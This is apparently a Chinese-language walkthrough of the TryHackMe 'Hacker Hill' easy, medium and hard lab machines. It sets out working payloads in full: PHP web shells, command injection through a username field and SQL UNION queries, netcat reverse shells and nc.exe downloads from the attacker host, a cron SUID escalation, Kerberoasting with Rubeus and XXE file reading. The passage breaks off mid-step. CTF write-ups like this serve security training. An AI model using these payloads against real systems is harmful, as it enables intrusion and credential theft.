共计 24770 个字符,预计需要花费 62 分钟才能阅读完成。
免责申明
本文浸透的主机通过非法受权。本文应用的工具和办法仅限学习交换应用,请不要将文中应用的工具和浸透思路用于任何非法用处,对此产生的所有结果,自己不承当任何责任,也不对造成的任何误用或侵害负责。
Easy Challenge
服务发现
┌──(root💀kali)-[~/tryhackme/hackerhill]
└─# nmap -sV -Pn 10.10.134.251
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 (https://nmap.org) at 2021-10-25 04:36 EDT
Nmap scan report for 10.10.134.251
Host is up (0.31s latency).
Not shown: 994 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
8000/tcp open http Apache httpd 2.4.29 ((Ubuntu))
8001/tcp open http Apache httpd 2.4.29 ((Ubuntu))
8002/tcp open http Apache httpd 2.4.29 ((Ubuntu))
9999/tcp open abyss?爆破 8000 端口的目录
──(root💀kali)-[~/dirsearch]
└─# python3 dirsearch.py -e* -t 100 -u 10.10.134.251:8000
_|. _ _ _ _ _ _|_ v0.3.8
(_||| _) (/_(_|| (_|)
Extensions: * | HTTP method: get | Threads: 100 | Wordlist size: 6100
Error Log: /root/dirsearch/logs/errors-21-10-25_04-57-13.log
Target: 10.10.134.251:8000
[04:57:13] Starting:
[04:57:22] 200 - 2KB - /about
[04:57:33] 200 - 2KB - /contact
[04:57:47] 500 - 613B - /public_html/robots.txt
[04:57:47] 200 - 30B - /robots.txt robots.txt显示有一个 cms
User-agent: *
Disallow: /vbcms关上是一个登陆页面,尝试用 admin:admin 登陆,竟然登陆上了。。。
登陆进去是一个页面编辑界面,能够间接改网页源代码,尝试写 php 发现能够运行,那就简略了,间接写 shell。。。
开启一个端口监听,把 shell 写进首页,拜访,触发反弹
┌──(root💀kali)-[~/tryhackme/hackerhill]
└─# nc -lnvp 1234
listening on [any] 1234 ...
connect to [10.13.21.169] from (UNKNOWN) [10.10.134.251] 59268
Linux web-serv 4.15.0-135-generic #139-Ubuntu SMP Mon Jan 18 17:38:24 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux
10:30:53 up 1:08, 0 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=1000(serv1) gid=1000(serv1) groups=1000(serv1),43(utmp)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=1000(serv1) gid=1000(serv1) groups=1000(serv1),43(utmp)
$ whoami
serv1
依据提醒,第一个 flag 在/usr/games/fortune,去到这个网站兑换到 tryhackme 须要的 flag
而后第二个,第三个依照批示去到 /var/lib/rary 和/var/www/serv4/index.php起下面网站兑换指定 flag
提权
传 linpeas.sh,发现 /home/serv3/backups/backup.sh 这个定时工作是用 root 身份执行的,频率为一分钟一次
查看 bash 文件权限
serv1@web-serv:/tmp$ ls -alh /home/serv3/backups/backup.sh
ls -alh /home/serv3/backups/backup.sh
-r-xr-xr-x 1 serv3 serv3 52 Feb 15 2021 /home/serv3/backups/backup.shserv1 没有权限编辑这个文件,也就是说咱们须要横向提权到 serv3?
在 /var/www/html/topSecretPrivescMethod 找到一个 secret.txt,看文件夹名字是提权办法,然而关上是一串乱码
在 :8002/lesson/1 这个 php 运行页面,原本能够间接运行 php 反弹 shell,然而因为页面连贯了一个谷歌前端框架,我 kali 不能翻墙,所以不能运行反弹不了 shell
于是钻研了下怎么在 linux 下连 v2ray,终于找到了这篇文章, 依照外面的办法 fq 胜利
回到下面那个页面,写入 php 反弹 shell,拿到 serv3 的 shell
┌──(root💀kali)-[~/tryhackme/hackhill]
└─# nc -lnvp 4444 1 ⨯
listening on [any] 4444 ...
connect to [10.13.21.169] from (UNKNOWN) [10.10.172.149] 33814
Linux web-serv 4.15.0-135-generic #139-Ubuntu SMP Mon Jan 18 17:38:24 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux
14:49:20 up 1:13, 0 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=1002(serv3) gid=1002(serv3) groups=1002(serv3)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=1002(serv3) gid=1002(serv3) groups=1002(serv3)咱们写入上面命令到 backup.sh,使得 bash 命令成为一个 SUIDecho "chmod 4777 /bin/bash" >> /home/serv3/backups/backup.sh
期待一分钟当前,执行 /bin/bash -p 拿到 root 权限
serv3@web-serv:/$ /bin/bash -p
/bin/bash -p
bash-4.4# id
id
uid=1002(serv3) gid=1002(serv3) euid=0(root) groups=1002(serv3)
bash-4.4# cat /root/root.txt Medium Challenge
服务发现
┌──(root💀kali)-[~/tryhackme/hackhill]
└─# nmap -sV -Pn 10.10.48.179 130 ⨯
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 (https://nmap.org) at 2021-10-25 10:00 EDT
Nmap scan report for 10.10.48.179
Host is up (0.32s latency).
Not shown: 985 filtered ports
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
81/tcp open http Microsoft IIS httpd 10.0
82/tcp open http Microsoft IIS httpd 10.0
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2021-10-25 14:01:00Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: troy.thm0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: troy.thm0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
3389/tcp open ms-wbt-server Microsoft Terminal Services
9999/tcp open abyss?中等难度是一台 windows 机器,开了很多服务,一个个查看
80,81,82 都是 http 服务,一一爆破目录
80
┌──(root💀kali)-[~/tryhackme/dirsearch]
└─# python3 dirsearch.py -e* -t 100 -u http://10.10.48.179
_|. _ _ _ _ _ _|_ v0.4.2
(_||| _) (/_(_|| (_|)
Extensions: php, jsp, asp, aspx, do, action, cgi, pl, html, htm, js, json, tar.gz, bak | HTTP method: GET | Threads: 100 | Wordlist size: 15492
Output File: /root/tryhackme/dirsearch/reports/10.10.48.179/_21-10-25_10-10-52.txt
Error Log: /root/tryhackme/dirsearch/logs/errors-21-10-25_10-10-52.log
Target: http://10.10.48.179/
[10:10:53] Starting:
[10:11:00] 200 - 2KB - /%3f/
[10:11:00] 403 - 312B - /%2e%2e//google.com
[10:11:00] 403 - 312B - /.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
[10:11:09] 403 - 312B - /\..\..\..\..\..\..\..\..\..\etc\passwd
[10:11:28] 403 - 312B - /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
[10:11:33] 302 - 0B - /dashboard -> /login
[10:11:48] 200 - 3KB - /login
[10:11:48] 200 - 3KB - /login/
[10:11:49] 302 - 0B - /logout/ -> /
[10:11:49] 302 - 0B - /logout -> /
[10:12:26] 302 - 0B - /profile -> /login
[10:12:45] 200 - 3KB - /signup 81
┌──(root💀kali)-[~/tryhackme/dirsearch]
└─# python3 dirsearch.py -e* -t 100 -u http://10.10.48.179:81
_|. _ _ _ _ _ _|_ v0.4.2
(_||| _) (/_(_|| (_|)
Extensions: php, jsp, asp, aspx, do, action, cgi, pl, html, htm, js, json, tar.gz, bak | HTTP method: GET | Threads: 100 | Wordlist size: 15492
Output File: /root/tryhackme/dirsearch/reports/10.10.48.179-81/_21-10-25_10-27-15.txt
Error Log: /root/tryhackme/dirsearch/logs/errors-21-10-25_10-27-15.log
Target: http://10.10.48.179:81/
[10:27:16] Starting:
[10:27:22] 200 - 5KB - /%3f/
[10:27:22] 403 - 312B - /%2e%2e//google.com
[10:27:23] 403 - 312B - /.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
[10:27:31] 403 - 312B - /\..\..\..\..\..\..\..\..\..\etc\passwd
[10:27:57] 403 - 312B - /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
[10:28:32] 400 - 24B - /ping 82
┌──(root💀kali)-[~/tryhackme/dirsearch]
└─# python3 dirsearch.py -e* -t 100 -u http://10.10.48.179:82
_|. _ _ _ _ _ _|_ v0.4.2
(_||| _) (/_(_|| (_|)
Extensions: php, jsp, asp, aspx, do, action, cgi, pl, html, htm, js, json, tar.gz, bak | HTTP method: GET | Threads: 100 | Wordlist size: 15492
Output File: /root/tryhackme/dirsearch/reports/10.10.48.179-82/_21-10-25_10-29-15.txt
Error Log: /root/tryhackme/dirsearch/logs/errors-21-10-25_10-29-15.log
Target: http://10.10.48.179:82/
[10:29:16] Starting:
[10:29:24] 403 - 312B - /%2e%2e//google.com
[10:29:25] 404 - 1KB - /+CSCOE+/session_password.html
[10:29:25] 404 - 1KB - /+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../
[10:29:25] 404 - 1KB - /+CSCOE+/logon.html#form_title_text
[10:29:25] 404 - 1KB - /+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=%2bCSCOE%2b/portal_inc.lua
[10:29:25] 403 - 312B - /.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
[10:29:26] 404 - 1KB - /.config/psi+/profiles/default/accounts.xml
[10:29:41] 403 - 312B - /\..\..\..\..\..\..\..\..\..\etc\passwd
[10:30:15] 404 - 1KB - /bitrix/web.config
[10:30:17] 403 - 312B - /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
[10:30:19] 404 - 1KB - /cms/Web.config
[10:30:30] 404 - 1KB - /examples/jsp/%252e%252e/%252e%252e/manager/html/
[10:30:41] 404 - 1KB - /lang/web.config
[10:30:50] 404 - 1KB - /modules/web.config
[10:31:00] 404 - 1KB - /plugins/web.config
[10:31:19] 404 - 1KB - /typo3conf/ext/static_info_tables/ext_tables_static+adt-orig.sql
[10:31:19] 404 - 1KB - /typo3conf/ext/static_info_tables/ext_tables_static+adt.sql
[10:31:24] 404 - 1KB - /web.config 80 服务运行一个上传服务,然而只能指定 .jpg 文件上传,试了绕不过来
81 服务运行了一个 ping 域名的服务,尝试命令行绕过,貌似不行
82 服务没看到啥有用的货色
81 端口看 url:81/ping?id=1,测试了一下,存在 sql 注入,那么应该这个才是攻击点
枚举数据库
sqlmap -u "http://10.10.48.179:81/ping?id=1" -p "id" --batch --dbms=mysql --technique B --dbs
available databases [2]:
[*] information_schema
[*] networkmonitor
其余信息
数据表:host 表字段:id,ip
用户名:monitor_read@localhot
明码:枚举不进去
getshell
这个 shell 始终打不进去,这里参考大佬的办法
在http://10.10.48.179/profile页面,用户名这个字段能够自在批改
而且每次批改完,上传后的门路随即也会被扭转
由此能够猜测上传代码可能为:
$old_username = 'admin'
$new_username = $GET['username']
system('mv' . $old_username . ' '. $new_username)因为 $old_username 这里是用户能够管制的,也就是说可能存在命令行注入破绽
验证:
在攻击机开启 tcpdump 监听所有 icmp 包
tcpdump -i tun0 icmp批改用户名 payload 为:admin_test | ping 10.13.21.169
如果监听能收到 ping 包,阐明咱们的命令注入胜利
胜利收到 ping 包:
┌──(root💀kali)-[~]
└─# tcpdump -i tun0 icmp 1 ⨯
tcpdump: verbose output suppressed, use -v[v]... for full protocol decode
listening on tun0, link-type RAW (Raw IP), snapshot length 262144 bytes
09:36:08.012297 IP 10.10.48.179 > 10.13.21.169: ICMP echo request, id 1, seq 13, length 40
09:36:08.012335 IP 10.13.21.169 > 10.10.48.179: ICMP echo reply, id 1, seq 13, length 40
09:36:09.008655 IP 10.10.48.179 > 10.13.21.169: ICMP echo request, id 1, seq 14, length 40
09:36:09.008693 IP 10.13.21.169 > 10.10.48.179: ICMP echo reply, id 1, seq 14, length 40
09:36:10.024224 IP 10.10.48.179 > 10.13.21.169: ICMP echo request, id 1, seq 15, length 40
09:36:10.024241 IP 10.13.21.169 > 10.10.48.179: ICMP echo reply, id 1, seq 15, length 40
09:36:11.047680 IP 10.10.48.179 > 10.13.21.169: ICMP echo request, id 1, seq 16, length 40
09:36:11.047696 IP 10.13.21.169 > 10.10.48.179: ICMP echo reply, id 1, seq 16, length 40把 nc.exe 传到靶机,以便咱们反弹 shell
curl -H "Cookie:token=eyJ1c2VybmFtZSI6ImFkbWluIiwiY29va2llIjoiZWRkYjkzY2UxODY5OTkwZDMyY2Y3ZWMzYTQyYWQxYzgifQ==" -XPOST http://10.10.48.179/profile -d 'username=asd | powershell curl 10.13.21.169:8000/nc.exe -o nc.exe'另起一个窗口监听 nc -lnvp 4242
靶机触发 payload:
admin1 | nc.exe 10.13.21.169 4242 -e powershell收到反弹 shell
┌──(root💀kali)-[~]
└─# nc -lnvp 4242
listening on [any] 4242 ...
connect to [10.13.21.169] from (UNKNOWN) [10.10.48.179] 50099
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
PS C:\Users\agamemnon\Desktop\WebApp\public> whoami
whoami
troy\agamemnon
在 C:\Users\agamemnon\Desktop 拿到用户 agamemnon 的 flag
查看一共有多少个用户
PS C:\> net users
net users
User accounts for \\TROY-DC
-------------------------------------------------------------------------------
achilles Administrator agamemnon
Guest hector helen
krbtgt patrocles
传 winPEASx64.exe 枚举,简直没有什么有用的信息
第二个 shell
因为咱们之前曾经晓得 81 端口存在一个 sql 注入,察看这个 webapp 的性能,如果咱们可能扭转 host 表 ip 这个字段的值,那么咱们同样也能够利用命令行注入拿到另外一个 shell
通过多翻测试,以后账号没有权限插入和批改数据库里的数据
这里应用 CONCAT 函数把注入命令当做一个字符串拼接到返回的后果当中,因为 id=9999 查问不到数据,返回的是一个空串,UNION 把后果和 ”|ipconfig” 连贯在了一起,所以程序最初执行的命令是ping |ipconfig
payload 如下:id=9999 UNION SELECT NULL,CONCAT("|","ipconfig")-- -
注入用 burpsuite 时下面的 payload 要用 urlencode 加密一下,否则会报 400
因为咱们当初曾经能够注入命令,像后面那个 shell 一样咱们把 nc.exe 传到靶机,而后再攻击机开启监听,拿到反弹 shell
传 nc.exe
id=9999 UNION SELECT NULL,CONCAT("|","powershell curl 10.13.21.169:8000/nc.exe -o nc.exe")-- -
本地监听
nc -lnvp 4444
反弹
id=9999 UNION SELECT NULL,CONCAT("|","nc.exe 10.13.21.169 4444 -e powershell")-- -
拿 shell
──(root💀kali)-[~/tryhackme/hackerhill]
└─# nc -lnvp 4444
listening on [any] 4444 ...
connect to [10.13.21.169] from (UNKNOWN) [10.10.48.179] 52658
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
PS C:\Users\helen\Desktop\WebApp\h1-tryhackme-medium-two-main\public> ls
PS C:\Users\helen\Desktop\WebApp\h1-tryhackme-medium-two-main\public> whoami
whoami
troy\helen
在 C:\Users\helen\Desktop 拿到 helen 的 flag
第三个 shell
82 端口这个 webapp 的 getshell 十分的 trick,以下解法参考了大佬的办法
剖析
首先这是一个提交框,数据被提交到后盾当前,在第二页的源代码正文会呈现这样一行文字:
Ticket saved to ../tickets/
然而无论咱们怎么拜访,失常状况下都是不能拜访 tickets 这个文件夹的
因为依照之前的教训,所有的 webapp 其实都是在 public 下,所以只有咱们可能疏导这个门路到 public 下,实践上咱们就能在 web 上拜访到 tikeit 的内容
通过测试 Email Address 这个字段能够承受双引号,邮箱格局结尾也容许.php
因而咱们的 payload 如下:
Email Address: “../public/”@admin.php*
Name: <?php system($_GET[‘c’]); ?\>*
Message: <?php system($_GET[‘c’]); ?\>*
上传当前显示:
saved to ../tickets/../public/@aaa.php
触发拜访:
http://10.10.48.179:82/@aaa.php?c=whoami
页面显示 whoami 命令返回
当初咱们失去了一个简略的交互式 shell
传 nc.exe
http://10.10.48.179:82/@aaa.php?c=powershell curl 10.13.21.169:8000/nc.exe -o nc.exe
本地监听
nc -lnvp 4445
反弹
http://10.10.48.179:82/@aaa.php?c=nc.exe 10.13.21.169 4445 -e powershell
拿 shell
┌──(root💀kali)-[~/tryhackme/hackerhill]
└─# nc -lnvp 4445
listening on [any] 4445 ...
connect to [10.13.21.169] from (UNKNOWN) [10.10.48.179] 49810
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
PS C:\Users\hector\Desktop\WebApp\h1-tryhackme-medium-three-main\public> whoami
whoami
troy\hector在 C:\Users\hector\Desktop 拿到 hector 的 flag
提权
把 Rubeus.exe 传到靶机
PS C:\Users\hector\Desktop> powershell curl 10.13.21.169:8000/Rubeus.exe -o Rubeus.exe
powershell curl 10.13.21.169:8000/Rubeus.exe -o Rubeus.exe dump 出用户哈希存到 hash.txt
PS C:\Users\hector\Desktop> .\Rubeus.exe kerberoast /outfile:dump.txt
.\Rubeus.exe kerberoast /outfile:dump.txt
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v2.0.0
[*] Action: Kerberoasting
[*] NOTICE: AES hashes will be returned for AES-enabled accounts.
[*] Use /ticket:X or /tgtdeleg to force RC4_HMAC for these accounts.
[*] Target Domain : troy.thm
[*] Searching path 'LDAP://TROY-DC.troy.thm/DC=troy,DC=thm' for '(&(samAccountType=805306368)(servicePrincipalName=*)(!samAccountName=krbtgt)(!(UserAccountControl:1.2.840.113556.1.4.803:=2)))'
[*] Total kerberoastable users : 1
[*] SamAccountName : achilles
[*] DistinguishedName : CN=Achilles,OU=Created Users,DC=troy,DC=thm
[*] ServicePrincipalName : TIME/TROY-DC.TROY.THM
[*] PwdLastSet : 19/02/2021 18:32:09
[*] Supported ETypes : RC4_HMAC_DEFAULT
[*] Hash written to C:\Users\hector\Desktop\dump.txt
[*] Roasted hashes written to : C:\Users\hector\Desktop\dump.txt把 dump.txt 传回 kali,用 john 破解
┌──(root💀kali)-[~/tryhackme/hackerhill]
└─# john dump.txt --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
winniethepooh (?)
1g 0:00:00:00 DONE (2021-10-28 02:40) 50.00g/s 153600p/s 153600c/s 153600C/s slimshady..dangerous
Use the "--show" option to display all of the cracked passwords reliably
Session completed
失去 achilles 的登陆密码
登陆 Achilles 的账号,发现原来曾经是 system 权限
┌──(root💀kali)-[~/windowns-privilege/impacket]
└─# /opt/impacket/build/scripts-3.9/psexec.py TROY.thm/Achilles:winniethepooh@10.10.48.179
Impacket v0.9.24.dev1+20210906.175840.50c76958 - Copyright 2021 SecureAuth Corporation
[*] Requesting shares on 10.10.48.179.....
[*] Found writable share ADMIN$
[*] Uploading file cbyYanQp.exe
[*] Opening SVCManager on 10.10.48.179.....
[*] Creating service CRPo on 10.10.48.179.....
[*] Starting service CRPo.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.1757]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
nt authority\system因为曾经拿到了 system 权限,至此咱们拿到了此靶机的所有 flag
Hard Challenge
服务发现
┌──(root💀kali)-[~/tryhackme/hackerhill]
└─# nmap -sV -Pn 10.10.243.173
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 (https://nmap.org) at 2021-10-28 04:04 EDT
Nmap scan report for 10.10.243.173
Host is up (0.33s latency).
Not shown: 993 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
81/tcp open http nginx 1.18.0 (Ubuntu)
82/tcp open http Apache httpd 2.4.41 ((Ubuntu))
2222/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
8888/tcp open http Werkzeug httpd 0.16.0 (Python 3.8.5)
9999/tcp open abyss?开了两个 ssh 服务,以及 4 个 http 服务,8888 那个端口用的是 python 做的 webapp
咱们一个个查看。。。
81 端口
目录爆破
┌──(root💀kali)-[~/tryhackme/dirsearch]
└─# python3 dirsearch.py -u http://10.10.243.173:81/ -e* -t 100
_|. _ _ _ _ _ _|_ v0.4.2
(_||| _) (/_(_|| (_|)
Extensions: php, jsp, asp, aspx, do, action, cgi, pl, html, htm, js, json, tar.gz, bak | HTTP method: GET | Threads: 100 | Wordlist size: 15492
Output File: /root/tryhackme/dirsearch/reports/10.10.243.173-81/-_21-10-28_08-54-57.txt
Error Log: /root/tryhackme/dirsearch/logs/errors-21-10-28_08-54-57.log
Target: http://10.10.243.173:81/
[08:54:59] Starting:
[08:55:40] 200 - 409KB - /access_log
[08:55:52] 301 - 178B - /images -> http://10.10.243.173/images/
[08:55:52] 403 - 564B - /images/
Task Completed /access_log 第一个拜访记录裸露一个文件夹/s3cr3t_area, 关上是一张图片,感觉没啥有用的信息。
82 端口
目录爆破
┌──(root💀kali)-[~/tryhackme/dirsearch]
└─# python3 dirsearch.py -u http://10.10.243.173:82/ -e* -t 100 2 ⨯
_|. _ _ _ _ _ _|_ v0.4.2
(_||| _) (/_(_|| (_|)
Extensions: php, jsp, asp, aspx, do, action, cgi, pl, html, htm, js, json, tar.gz, bak
HTTP method: GET | Threads: 100 | Wordlist size: 15492
Output File: /root/tryhackme/dirsearch/reports/10.10.243.173-82/-_21-10-28_08-49-12.txt
Error Log: /root/tryhackme/dirsearch/logs/errors-21-10-28_08-49-12.log
Target: http://10.10.243.173:82/
[08:49:13] Starting:
[08:49:32] 400 - 304B - /.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
[08:50:35] 400 - 304B - /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
[08:50:50] 200 - 21B - /feed
[08:50:55] 301 - 316B - /images -> http://10.10.243.173:82/images/
[08:51:23] 200 - 2KB - /search
[08:51:31] 301 - 0B - /t -> /t/ 在 http://10.10.243.173:82/t/r/y/h/a/r/d/e/r/spamlog.log 找到信息
Nahamsec made me do it :(
没卵用
一个搜寻框,在 burpsuite 上把搜寻申请信息截取进去, 保留到 data2 文件
└─# cat data2
POST /search HTTP/1.1
Host: 10.10.243.173:82
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 3
Origin: http://10.10.243.173:82
Connection: close
Referer: http://10.10.243.173:82/search
Upgrade-Insecure-Requests: 1
q=a
sqlmap 测试证实存在 sql 注入,payload 为:
sqlmap -r data2 –level=5 –risk=3 –dbms=mysql
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: q=1%'AND 3240=3240 AND'UEDj%'='UEDj枚举到的信息有:
数据库:hillpics
表:hill
以后用户:’hill’@’localhost’
明码:无奈获取
以后用户角色和权限:USAGE(最低权限)
os-shell: 无奈获取
其余没有什么有用的信息
8888 端口
爆破目录
┌──(root💀kali)-[~/tryhackme/dirsearch]
└─# python3 dirsearch.py -e* -t 100 -u http://10.10.243.173:8888
_|. _ _ _ _ _ _|_ v0.4.2
(_||| _) (/_(_|| (_|)
Extensions: php, jsp, asp, aspx, do, action, cgi, pl, html, htm, js, json, tar.gz, bak
HTTP method: GET | Threads: 100 | Wordlist size: 15492
Output File: /root/tryhackme/dirsearch/reports/10.10.243.173-8888/_21-10-28_09-36-47.txt
Error Log: /root/tryhackme/dirsearch/logs/errors-21-10-28_09-36-47.log
Target: http://10.10.243.173:8888/
[09:36:47] Starting:
[09:38:05] 200 - 135B - /apps
[09:39:19] 200 - 45B - /users
Task Completed/apps 打印:
{"app1": {"name": "online file storage"}, "app2": {"name": "media player"}, "app3": {"name": "file sync"}, "app4": {"name": "/users"}}
/users 打印:
{"user": {"davelarkin": "totallysecurehuh"}}
这里爆出了 davelarkin 的 ssh 登录凭证,通过 2222 端口拿到了 flag4
┌──(root💀kali)-[~/.ssh]
└─# ssh davelarkin@10.10.243.173 -p 2222 255 ⨯
The authenticity of host '[10.10.243.173]:2222 ([10.10.243.173]:2222)' can't be established.
ECDSA key fingerprint is SHA256:D0vPRUo5EfUivVKiJf3i6JIOF50DxmKg/avxmu6bx4o.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '[10.10.243.173]:2222' (ECDSA) to the list of known hosts.
davelarkin@10.10.243.173's password:
Welcome to Ubuntu 20.04.1 LTS (GNU/Linux 5.4.0-1037-aws x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
This system has been minimized by removing packages and content that are
not required on a system that users do not log into.
To restore this content, you can run the 'unminimize' command.
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
davelarkin@a9ef0531077f:~$ whoami
davelarkin
davelarkin@a9ef0531077f:~$ ls
api bin container4_flag.txt
davelarkin@a9ef0531077f:~$ cat container4_flag.txt
传 linpeas 发现是在 docker 内
浸透 80 端口的 http 服务
目录爆破
┌──(root💀kali)-[~/dirsearch]
└─# python3 dirsearch.py -e* -t 100 -u http://10.10.243.173
_|. _ _ _ _ _ _|_ v0.4.2
(_||| _) (/_(_|| (_|)
Extensions: php, jsp, asp, aspx, do, action, cgi, pl, html, htm, js, json, tar.gz, bak | HTTP method: GET | Threads: 100 | Wordlist size: 15492
Output File: /root/dirsearch/reports/10.10.243.173/_21-10-28_04-15-43.txt
Error Log: /root/dirsearch/logs/errors-21-10-28_04-15-43.log
Target: http://10.10.243.173/
[04:15:44] Starting:
[04:16:50] 200 - 136B - /api
[04:16:50] 200 - 136B - /api/
[04:17:27] 200 - 2KB - /login
[04:17:28] 200 - 2KB - /login/
[04:17:29] 302 - 0B - /logout -> /login
[04:17:29] 302 - 0B - /logout/ -> /login
[04:17:52] 302 - 0B - /shell -> /login
[04:17:52] 302 - 0B - /shell/ -> /login 咱们看到至多有三个文件夹,shell 这个文件夹应该有乏味的货色,然而重定向到了 login
api 文件夹能够失常关上,打印了一串 json,裸露进去 Apache,php,mysql 的版本号,数据库名字:servermanager
{“name”:”Server Manager”,”stack”:{“nginx”:”Apache/2.4.41 (Ubuntu)”,”php”:”7.4.3″,”mysql”:{“version”:”5.6″,”database”:”servermanager”}}}
login 页面源代码显示,如果胜利登录,将被导向一个 token 页面, 并且能够携带一个参数
<script>
$('.login').click(function(){
$.post('/api/user/login',{'username' : $('input[name="username"]').val(),
'password' : $('input[name="password"]').val()},function(resp){if( resp.login){window.location = '/token?token=' + resp.token;}else{alert( resp.error);
}
});
})
</script>看样子像是一个 servermanager 数据库的登陆页面。不晓得用户名
持续对 /api/user 爆破
┌──(root💀kali)-[~/tryhackme/dirsearch]
└─# python3 dirsearch.py -e* -t 100 -u http://10.10.243.173/api/user
_|. _ _ _ _ _ _|_ v0.4.2
(_||| _) (/_(_|| (_|)
Extensions: php, jsp, asp, aspx, do, action, cgi, pl, html, htm, js, json, tar.gz, bak | HTTP method: GET | Threads: 100 | Wordlist size: 15492
Output File: /root/tryhackme/dirsearch/reports/10.10.243.173/-api-user_21-10-28_09-49-39.txt
Error Log: /root/tryhackme/dirsearch/logs/errors-21-10-28_09-49-39.log
Target: http://10.10.243.173/api/user/
[09:49:41] Starting:
[09:51:22] 200 - 53B - /api/user/login
[09:51:22] 200 - 53B - /api/user/login/
[09:51:44] 200 - 91B - /api/user/session/
[09:51:44] 200 - 91B - /api/user/session/api/user/session/打印
{“active_sessions”:[{“id”:1,”username”:”admin”,”hash”:”1b4237f476826986da63022a76c35bb1″}]}
貌似能够必定用户名就是 admin
1b4237f476826986da63022a76c35bb1 是 md5 密文, 解密当前是:dQw4w9WgXcQ
然而 admin:dQw4w9WgXcQ 不能登录
what the fuck….
这串乖僻的符号和 youtube 上的这个视频的 id 竟然一样:
视频是 Rick Astley – Never Gonna Give You Up (Official Music Video),不晓得是作者在叫我不要放弃还是有什么提醒。。。
爆破 admin 账号不胜利,sql 注入也没有后果。在我教训范畴内,我曾经用尽了所有办法,所以这个时候我只能看大佬 walkthrough 了:)
原来是在 burpsuite 里用 xml 注入
payload
GET /api/user?xml HTTP/1.1
Host: 10.10.243.173
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Content-Length: 148
<?xml version="1.0"?>
<!DOCTYPE foo [<!ENTITY ac SYSTEM "php://filter/read=convert.base64-encode/resource=index.php">]>
<foo><id>∾</id></foo>返回了 index.php 的 base64 密文,解进去是:
<?php
include_once('../Autoload.php');
include_once('../Route.php');
include_once('../Output.php');
include_once('../View.php');
Route::load();
Route::run();最初在 ../controllers/Api.php 找到 admin 的登录凭证:niceWorkHackerm4n
登录进去后在靶机提供的 webshell 栏写 payload:
